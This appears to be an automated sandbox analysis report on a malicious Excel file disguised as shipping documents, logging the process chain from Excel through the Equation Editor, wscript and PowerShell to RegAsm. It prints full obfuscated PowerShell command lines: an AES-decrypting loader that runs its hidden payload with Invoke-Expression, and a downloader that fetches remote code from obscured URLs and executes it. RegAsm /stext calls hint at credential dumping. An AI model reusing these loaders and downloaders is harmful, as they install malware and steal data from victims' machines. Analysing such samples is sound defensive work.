Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................l..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................x..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P............................. ..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................,..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................I..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................U..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......g..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................s..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................&..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................2..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......D..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................P..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................b..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................n..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8..................................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................%..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................7..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................C..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................`..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................l..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......~..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................. ..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................=..........................s....................j.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................I..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.8.......[..........................s............(.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................g..........................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................y..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................`.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=680

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 00000013.00000002.488360309.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	ReversingLabs: Detection: 21%
Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	Virustotal: Detection: 25%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nazcoqq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, 